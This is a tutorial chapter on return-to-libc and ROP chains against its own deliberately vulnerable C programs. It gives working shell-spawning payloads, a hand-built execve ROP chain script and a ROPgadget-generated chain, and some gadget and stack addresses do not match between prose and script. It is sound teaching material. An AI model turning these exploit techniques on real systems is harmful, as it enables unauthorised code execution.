Return-oriented Programming (ROP)

In the previous chapters the usage of existing functions as well as custom shellcode as execution target were discussed. As using existing functions is rather inflexible and there are several protection mechanisms avoiding the injection of custom executable code, an advanced exploitation approach is required. This chapter focuses on exploitation by returning to existing code which is generally called Return-oriented Programming (ROP). Due to the fact that ROP uses only existing code it is not prevented by NX1). While a very simple ROP exploit was actually already used to redirect execution to an existing function without parameters, this chapter will explain the concept in more detail.

Return-to-libc

Following vulnerable example code is considered in this section.

rop/libc.c
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 libc.c
#include <stdio.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[8] = {0};
 
    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }
 
    strcpy(buffer, argv[1]);
    return 0;
}

The application to be exploited is very small and contains no function to redirect execution to. However, at runtime we have the code of all linked shared libraries available. Due to the fact that libc is available on almost every system, it is an omnipresent code base for attacks. A ROP exploit using libc is called return-to-libc (or ret2libc for short)2). Executing arbitrary shell commands, calling the system() function is a promising target for redirecting execution to. The only requirement when returning into system() is to pass the command to be executed as first parameter.

ldd is used to find out the address of the library when loaded for the example application.

$ ldd a.out
    linux-gate.so.1 (0xf7fd7000)
    libc.so.6 => /lib32/libc.so.6 (0xf7df9000)
    /lib/ld-linux.so.2 (0xf7fd9000)

Assuming an operating system having ASLR disabled, 0xf7df9000 is the address of the library after being loaded, but the offset of the system() function within the library still needs to be found out. nm is used to find the address of the system() function.

$ nm -D /lib32/libc.so.6 | grep system
0003a850 T __libc_system
00113c60 T svcerr_systemerr
0003a850 W system

Adding up the library offset 0xf7df9000 and the function offset 0x0003a850, results in an absolute address of 0xf7e33850. The final piece of the exploit is the parameter for system(). Luckily, libc contains a “/bin/sh“ string. GDB is used to find the address of this string.

Load the application into the debugger and set a breakpoint in the main function. Start the application and wait for the breakpoint to be hit.

$ gdb -q a.out 
Reading symbols from a.out...done.
(gdb) break main
Breakpoint 1 at 0x804843c: file rop_libc.c, line 7.
(gdb) run
Starting program: /home/memory-corruption/a.out 

Breakpoint 1, main (argc=1, argv=0xffffd414) at rop_libc.c:7
7	    char buffer[8] = {0};

Restricting the search for the string to the library, the start and end addresses need to be known. Although the start address was already discovered via ldd, the end address is still unknown. Using GDB, access to the address mapping of shared libraries is quite easy.

(gdb) info proc mappings 
process 2955
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
	 0x8048000  0x8049000     0x1000        0x0 /home/memory-corruption/a.out
	 0x8049000  0x804a000     0x1000        0x0 /home/memory-corruption/a.out
	 0x804a000  0x804b000     0x1000     0x1000 /home/memory-corruption/a.out
	0xf7df7000 0xf7df9000     0x2000        0x0 
	0xf7df9000 0xf7faa000   0x1b1000        0x0 /lib32/libc-2.24.so
	0xf7faa000 0xf7fac000     0x2000   0x1b0000 /lib32/libc-2.24.so
	0xf7fac000 0xf7fad000     0x1000   0x1b2000 /lib32/libc-2.24.so
	0xf7fad000 0xf7fb0000     0x3000        0x0 
	0xf7fd2000 0xf7fd4000     0x2000        0x0 
	0xf7fd4000 0xf7fd7000     0x3000        0x0 [vvar]
	0xf7fd7000 0xf7fd9000     0x2000        0x0 [vdso]
	0xf7fd9000 0xf7ffc000    0x23000        0x0 /lib32/ld-2.24.so
	0xf7ffc000 0xf7ffd000     0x1000    0x22000 /lib32/ld-2.24.so
	0xf7ffd000 0xf7ffe000     0x1000    0x23000 /lib32/ld-2.24.so
	0xfffdd000 0xffffe000    0x21000        0x0 [stack]

It can be concluded, that the end address of libc is 0xf7fad000. These restrictions are now used to search for the “/bin/sh“ string.

(gdb) find 0xf7df9000,0xf7fad000,"/bin/sh"
0xf7f55cc8
1 pattern found.

The structure of the payload is as follows. 8 bytes of the buffer need to be filled up. Next, the 4 bytes of the saved EBP need to skipped as well. The return address is overwritten with the address of system(). In order to maintain a correct stack frame layout and offset, a dummy return address for system() is required. Finally, the address of “/bin/sh“ is added as the parameter to system(). Passing this payload to the program, spawns a command shell.

$ ./a.out $(echo -en "AAAAAAAABBBB\x50\x38\xe3\xf7CCCC\xc8\x5c\xf5\xf7")
$

ROP Chains

System calls expect parameters not on the stack but in registers. Because registers cannot directly be overwritten by using a buffer overflow, the above concept does not apply to them. Furthermore, the x64 architecture applies the usage of registers as parameter storage also to function calls and not only system calls.

Taking the concept of return-to-libc one step further, instead of a single function several code chunks are used. Thus the exploit payload consists of multiple return addresses pointing to small code chunks terminated by a ret instruction each. These code chunks are commonly called „gadgets“. Concatenating them together results in a so-called „ROP chain“. Note that the instruction sequence of a gadget does not necessarily need to be valid code with respect to the original application. As shown in the chapter about NOP sleds, inspecting opcodes at a varying offset also changes their meaning and resulting instructions.

The protection mechanism ASLR randomizes the addresses of shared libraries. Thus it is not possible to find a static target address to redirect execution to for return-to-libc attacks. Following examples assume ASLR is enabled on the executing system.

Toy Example

Before jumping into a real-world example application, a toy example will be presented to further illustrate the basic concept. Following gadgets are assumed to be available.

; Gadget 1
xor eax, eax
ret
; Gadget 2
inc eax
ret
; Gadget 3
mov ebx, eax
ret
; Gadget 4
pop ecx
pop edx
ret
; Gadget 5
push eax
ret
; Gadget 6
inc ecx
ret

The goal is to reach the following register state:

  • EAX = 3
  • EBX = 2
  • ECX = 1
  • EDX = 0

There are several gadget sequences to reach the destination state. One solution sequence is listed below.

Gadget 1
EAX = 0, EBX = undefined, ECX = undefined, EDX = undefined
Stack: Empty

Gadget 5
EAX = 0, EBX = undefined, ECX = undefined, EDX = undefined
Stack: 0

Gadget 5
EAX = 0, EBX = undefined, ECX = undefined, EDX = undefined
Stack: 0, 0

Gadget 4
EAX = 0, EBX = undefined, ECX = 0, EDX = 0
Stack: Empty

Gadget 6
EAX = 0, EBX = undefined, ECX = 1, EDX = 0
Stack: Empty

Gadget 2
EAX = 1, EBX = undefined, ECX = 1, EDX = 0
Stack: Empty

Gadget 2
EAX = 2, EBX = undefined, ECX = 1, EDX = 0
Stack: Empty

Gadget 3
EAX = 2, EBX = 2, ECX = 1, EDX = 0
Stack: Empty

Gadget 2
EAX = 3, EBX = 2, ECX = 1, EDX = 0
Stack: Empty

Building a ROP Chain Manually

Considering the slightly modified example from before, this section illustrates the manual generation of a ROP chain. The only difference to the previous example is that all shared libraries - especially libc - are linked statically into a single binary.

rop/execve.c
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 execve.c
#include <stdio.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[8] = {0};
 
    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }
 
    strcpy(buffer, argv[1]);
    return 0;
}

In the next example the goal is to spawn a shell via a execve system call3). As already described in the chapter about buffer overflow basics the required state is specified as the following:

  • EAX contains an identifier for the system call and needs to have the value 11 (0x0b).
  • EBX points to the (\0-terminated) name of the executable to be executed (“/bin/sh“ in our case).
  • ECX points to argv, this means it represents an array that contains at least a pointer to the executable name (as referenced by EBX) and is terminated with a NULL-pointer.
  • EDX points to envp. As we do not need environment variables for the execution, we can simply set it to NULL.

The goal is the find a sequence of gadgets that result in this state. Additionally, strcpy() introduces the restriction that the payload is not allowed to contain a byte of value 0.

It is important to note that processing the binary with objdump results only in a small subset of all possible ROP gadgets as it uses only the regular offset for disassembling. However, there are tools like ROPgadget4) and Ropper5) that can be used to extract all gadgets. These tools can even generate ROP chains automatically as presented in the next section. For practice reasons, the step of combining gadgets to a chain is done manually here.

For execve we need some values on the stack. However, as we are abusing the stack to manage the control flow, another memory region is used to create a custom stack. The memory region used for this stack must be writable and may not contain a byte of the value 0 in its address. GDB helps to find the candidates.

$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) maintenance info sections 
Exec file:
    `/home/memory-corruption/a.out', file type elf32-i386.
 [0]     0x80480f4->0x8048114 at 0x000000f4: .note.ABI-tag ALLOC LOAD READONLY DATA HAS_CONTENTS
 [1]     0x8048114->0x8048138 at 0x00000114: .note.gnu.build-id ALLOC LOAD READONLY DATA HAS_CONTENTS
 [2]     0x8048138->0x80481b0 at 0x00000138: .rel.plt ALLOC LOAD READONLY DATA HAS_CONTENTS
 [3]     0x80481b0->0x80481d3 at 0x000001b0: .init ALLOC LOAD READONLY CODE HAS_CONTENTS
 [4]     0x80481d8->0x8048250 at 0x000001d8: .plt ALLOC LOAD READONLY CODE HAS_CONTENTS
 [5]     0x8048250->0x80bb8d4 at 0x00000250: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
 [6]     0x80bb8e0->0x80bc34d at 0x000738e0: __libc_freeres_fn ALLOC LOAD READONLY CODE HAS_CONTENTS
 [7]     0x80bc350->0x80bc3ee at 0x00074350: __libc_thread_freeres_fn ALLOC LOAD READONLY CODE HAS_CONTENTS
 [8]     0x80bc3f0->0x80bc404 at 0x000743f0: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
 [9]     0x80bc420->0x80d686c at 0x00074420: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
 [10]     0x80d686c->0x80d6894 at 0x0008e86c: __libc_subfreeres ALLOC LOAD READONLY DATA HAS_CONTENTS
 [11]     0x80d68a0->0x80d6bf4 at 0x0008e8a0: __libc_IO_vtables ALLOC LOAD READONLY DATA HAS_CONTENTS
 [12]     0x80d6bf4->0x80d6bf8 at 0x0008ebf4: __libc_atexit ALLOC LOAD READONLY DATA HAS_CONTENTS
 [13]     0x80d6bf8->0x80d6bfc at 0x0008ebf8: __libc_thread_subfreeres ALLOC LOAD READONLY DATA HAS_CONTENTS
 [14]     0x80d6bfc->0x80e9860 at 0x0008ebfc: .eh_frame ALLOC LOAD READONLY DATA HAS_CONTENTS
 [15]     0x80e9860->0x80e991f at 0x000a1860: .gcc_except_table ALLOC LOAD READONLY DATA HAS_CONTENTS
 [16]     0x80eaf60->0x80eaf70 at 0x000a1f60: .tdata ALLOC LOAD DATA HAS_CONTENTS
 [17]     0x80eaf70->0x80eaf88 at 0x000a1f70: .tbss ALLOC
 [18]     0x80eaf70->0x80eaf78 at 0x000a1f70: .init_array ALLOC LOAD DATA HAS_CONTENTS
 [19]     0x80eaf78->0x80eaf80 at 0x000a1f78: .fini_array ALLOC LOAD DATA HAS_CONTENTS
 [20]     0x80eaf80->0x80eaff0 at 0x000a1f80: .data.rel.ro ALLOC LOAD DATA HAS_CONTENTS
 [21]     0x80eb000->0x80eb048 at 0x000a2000: .got.plt ALLOC LOAD DATA HAS_CONTENTS
 [22]     0x80eb060->0x80ebf80 at 0x000a2060: .data ALLOC LOAD DATA HAS_CONTENTS
 [23]     0x80ebf80->0x80ecdac at 0x000a2f80: .bss ALLOC
 [24]     0x80ecdac->0x80ecdc4 at 0x000a2f80: __libc_freeres_ptrs ALLOC
 [25]     0x0000->0x0026 at 0x000a2f80: .comment READONLY HAS_CONTENTS
 [26]     0x0000->0x0020 at 0x000a2fa6: .debug_aranges READONLY HAS_CONTENTS
 [27]     0x0000->0x0364 at 0x000a2fc6: .debug_info READONLY HAS_CONTENTS
 [28]     0x0000->0x0109 at 0x000a332a: .debug_abbrev READONLY HAS_CONTENTS
 [29]     0x0000->0x00c7 at 0x000a3433: .debug_line READONLY HAS_CONTENTS
 [30]     0x0000->0x02ca at 0x000a34fa: .debug_str READONLY HAS_CONTENTS

All memory regions marked as READONLY can not be considered for this task. We will choose following memory region:

 [22]     0x80eb060->0x80ebf80 at 0x000a2060: .data ALLOC LOAD DATA HAS_CONTENTS

Next, the necessary gadgets need to be identified. Ropper will be used interactively to extract and search through all the gadgets.

$ ropper --file a.out --console
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%

Naturally, there are many practically infinitely many ways to reach the desired state.

For example consider that EAX should be set to 11. As this property is very specific, we need to combine some gadgets. First, EAX should be set to 0. A quick search with Ropper reveals a perfect gadget:

(a.out/ELF/x86)> search xor eax, eax
[INFO] Searching for gadgets: xor eax, eax

[INFO] File: a.out
[...]
0x080493e3: xor eax, eax; ret;

To increase the value of EAX, one could search for a simple increment:

(a.out/ELF/x86)> search inc eax
[INFO] Searching for gadgets: inc eax

[INFO] File: a.out
[...]
0x0807b15f: inc eax; ret; 

However, there exists also the following gadget which has the penalty of a pop instruction that needs to be taken care of:

0x0808ecd2: add eax, 0xb; pop edi; ret;

The selection of the gadgets is up to the developer of the chain. In this example, the following gadgets are used.

0x080493e3: xor eax, eax; ret;
0x0808ecc2: add eax, 0xb; pop edi; ret;
0x080b9086: pop eax; ret;
0x0806fb7a: pop edx; ret;
0x0806fba1: pop ecx; pop ebx; ret;
0x0805557b: mov dword ptr [edx], eax; ret;
0x08054d75: mov edx, 0xffffffff; ret;
0x0805dab7: inc edx; ret;
0x0806d755: int 0x80;

We will start by setting up the custom stack for execve. The binary does not contain a “/bin/sh“ string, so we push it to our stack. EDX is initialized to point to our stack. This is done by returning to

pop edx
ret

gadget and providing the value to be popped right afterwards. As the custom stack should be placed at 0x000a2060, the first bytes addresses of the ROP chain are as follows.

0x0806fb7a: pop edx; ret;
0x000a2060: address of custom stack

Only the addresses on the left are part of the chain, the code to the right is only used to increase readability. Next, EAX is set to contain the string “bi“. <code> 0x080b9086: pop eax; ret; 0x2f2f6269: “bi“ </code>

Finally, EAX is written to the custom stack.

0x0805557b: mov dword ptr [edx], eax; ret;

Using the same scheme, the string „n/sh“ is written to the stack.

0x0806fb7a: pop edx; ret;
0x000a2064: address of custom stack + 4
0x080b9086: pop eax; ret;
0x6e2f7368: "n/sh"
0x0805557b: mov dword ptr [edx], eax; ret;

Although “bin/sh“ should now be placed on the stack, it still lacks a terminating \0 byte. <code> 0x0806fb7a: pop edx; ret; 0x000a2068: address of custom stack + 8 0x080493e3: xor eax, eax; ret; 0x0805557b: mov dword ptr [edx], eax; ret; </code> We also need to setup argv on the stack. Remember that argv needs to contain a pointer to “bin/sh“ and a NULL-pointer. First the pointer to the name of the executable is written to the custom stack:

0x0806fb7a: pop edx; ret;
0x000a206c: address of custom stack + 12
0x080b9086: pop eax; ret;
0x000a2060: address of custom stack ("//bin/sh")
0x0805557b: mov dword ptr [edx], eax; ret;

The terminating NULL-pointer is added directly afterwards.

0x0806fb7a: pop edx; ret;
0x000a2070: address of custom stack + 16
0x080493e3: xor eax, eax; ret;
0x0805557b: mov dword ptr [edx], eax; ret;

With argv being complete, the stack setup is finished.

EAX is 0, but needs to be 11. Fortunately, there is a gadget simply adding 11. A dummy value needs to added for the pop edi instruction. This can be any value not containing a byte of value 0.

0x0808ecc2: add eax, 0xb; pop edi; ret;
0x000a2060: dummy value

EBX and ECX need to point to the correct values on the custom stack.

0x0806fba1: pop ecx; pop ebx; ret;
0x000a206c: argv (["//bin/sh", NULL])
0x000a2060: address of custom stack ("//bin/sh")

EDX is set to 0 via an integer overflow to set envp to NULL.

0x08054d75: mov edx, 0xffffffff; ret;
0x0805dab7: inc edx; ret;

As a very last step, the interrupt for the system call needs to be executed.

0x0806d755: int 0x80;

To get the final chain, concatenate all values together in the described order. Do not forget that values need to be passed in little-endian format to the application. A Python script helps to generate the payload.

rop/manual_chain.py
#!/usr/bin/env python2
from struct import pack
 
chain = 'AAAABBBBCCCC'
chain += pack('<I', 0x0806fb7a)
chain += pack('<I', 0x080eb060)
chain += pack('<I', 0x080b9086)
chain += '//bi'
chain += pack('<I', 0x0805557b)
chain += pack('<I', 0x0806fb7a)
chain += pack('<I', 0x080eb064)
chain += pack('<I', 0x080b9086)
chain += 'n/sh'
chain += pack('<I', 0x0805557b)
chain += pack('<I', 0x0806fb7a)
chain += pack('<I', 0x080eb068)
chain += pack('<I', 0x080493e3)
chain += pack('<I', 0x0805557b)
chain += pack('<I', 0x0806fb7a)
chain += pack('<I', 0x080eb06c)
chain += pack('<I', 0x080b9086)
chain += pack('<I', 0x080eb060)
chain += pack('<I', 0x0805557b)
chain += pack('<I', 0x0806fb7a)
chain += pack('<I', 0x080eb070)
chain += pack('<I', 0x080493e3)
chain += pack('<I', 0x0805557b)
chain += pack('<I', 0x0808ecc2)
chain += pack('<I', 0x080eb060)
chain += pack('<I', 0x0806fba1)
chain += pack('<I', 0x080eb06c)
chain += pack('<I', 0x080eb060)
chain += pack('<I', 0x08054d75)
chain += pack('<I', 0x0805dab7)
chain += pack('<I', 0x0806d755)
print chain

Passing the output of the script to the application spawns a shell.

$ ./a.out "`./manual_chain.py`"
$

Generating a ROP Chain Automatically

In the previous section the manual creation of a ROP chain was described. While it is important to understand the concept of building a ROP chain, the actual generation can often be automated.

A ROP chain for the sample application can be generated automatically with ROPgadget:

$ ROPgadget --binary a.out --ropchain

The result of this execution is a Python script constructing the chain. After fixing the padding and adding the print statement in the last line, the resulting script is as follows.

rop/generated_chain.py
#!/usr/bin/env python2
# execve generated by ROPgadget
 
from struct import pack
 
# Padding goes here
p = 'AAAABBBBCCCC'
 
p += pack('<I', 0x0806fb7a) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x080b9086) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805557b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fb7a) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x080b9086) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805557b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fb7a) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080493e3) # xor eax, eax ; ret
p += pack('<I', 0x0805557b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481d1) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x0806fba1) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080eb060) # padding without overwrite ebx
p += pack('<I', 0x0806fb7a) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080493e3) # xor eax, eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0806d755) # int 0x80
print p

Passing the generated ROP chain to the application spawns a shell.

$ ./a.out "`./generated_chain.py`"
$

Although the manually created chain was not optimized, it is still shorter than the automatically generated one. In cases of a limited input length this could be an important aspect to consider.



← Back to external buffers Overview Continue with the exploitation of x64 systems →

1) T. Saito, R. Watanabe, S. Kondo, S. Sugawara and M. Yokoyama, „A Survey of Prevention/Mitigation against Memory Corruption Attacks,“ 2016 19th International Conference on Network-Based Information Systems (NBiS), Ostrava, 2016, pp. 500-505.
2) Jon Erickson (2008). Hacking: The Art of Exploitation (2nd edition)